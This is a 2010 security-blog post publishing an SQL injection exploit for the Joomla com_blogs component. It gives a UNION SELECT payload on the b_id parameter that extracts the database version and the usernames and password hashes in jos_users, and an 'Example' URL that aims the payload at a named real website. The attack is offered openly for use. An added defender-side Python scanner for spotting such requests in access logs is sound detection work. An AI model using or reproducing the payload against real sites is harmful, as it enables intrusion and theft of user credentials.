Saturday, September 11, 2010

Joomla Component com_blogs SQL injection vulnerability


~[+] Exploit Title: Joomla Component Blogs SQL injection vulnerability
~[+] Author : ibl13Z [at]hackermail.com

~[+] Vulnerable :
http://127.0.0.1/index.php?option=com_blogs&task=details&b_id=[CrutZ]

~[+] Exploit:
/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--

~[+] Example :
http://www.mumcentremalaysia.com/index.php?option=com_blogs&task=details&b_id=173 /**/ AND /**/ 1=2 /**/ UNION /**/ SELECT /**/ 0,1,2,3,version(),database(),concat(username,0x3a,password) /**/ from /**/ jos_users--
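
A defender-side check for the request pattern above, added here as an example and not part of the original post: it scans web-server access-log lines for com_blogs requests whose b_id value is anything other than a plain integer, decoding repeated URL-encoding first. The function names, the Apache combined log format, the assumption that b_id is always numeric, and the sample lines are all constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Request target from a combined-format access-log line; ".+?" tolerates raw spaces.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SQL_KEYWORDS = re.compile(r"\b(union|select|from|and|or|concat|version|database)\b", re.I)
SQL_COMMENT = re.compile(r"/\*|\*/|--|#")

def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding (e.g. %2520) so the checks see the final text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_b_id(value):
    """Return the reasons a b_id value is suspicious; an empty list means clean."""
    value = fully_decode(value)
    reasons = []
    if not re.fullmatch(r"[0-9]{1,10}", value):  # assumption: b_id is numeric
        reasons.append("b_id is not a plain integer")
    if SQL_COMMENT.search(value):
        reasons.append("SQL comment sequence")
    keywords = sorted({k.lower() for k in SQL_KEYWORDS.findall(value)})
    if keywords:
        reasons.append("SQL keywords: " + ",".join(keywords))
    return reasons

def scan_line(line):
    """Return None for non-com_blogs requests, else the findings for every b_id."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
    if "com_blogs" not in query.get("option", []):
        return None
    return [r for value in query.get("b_id", []) for r in check_b_id(value)]

# Constructed sample log lines (not taken from any real server).
PREFIX = '127.0.0.1 - - [11/Sep/2010:10:00:00 +0000] "GET /index.php?'
SAMPLE_LOG = [
    PREFIX + 'option=com_blogs&task=details&b_id=173 HTTP/1.1" 200 5120',
    PREFIX + 'option=com_blogs&task=details&b_id=173%20/**/%20AND%20/**/%201=2'
             '%20/**/%20UNION%20/**/%20SELECT%200,1 HTTP/1.1" 200 5301',
    PREFIX + 'option=com_blogs&task=details&b_id=173%2520UNION%2520SELECT%25201 HTTP/1.1" 200 5301',
    PREFIX + 'option=com_content&view=article&id=5 HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry), "<-", entry.split('"')[1])
```

The integer check is the strong signal; the comment and keyword findings only help triage what was attempted.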


About Me

A blog for information security research and development, intended for posting the latest vulnerabilities and weaknesses. Founder darknessn1k0!4

 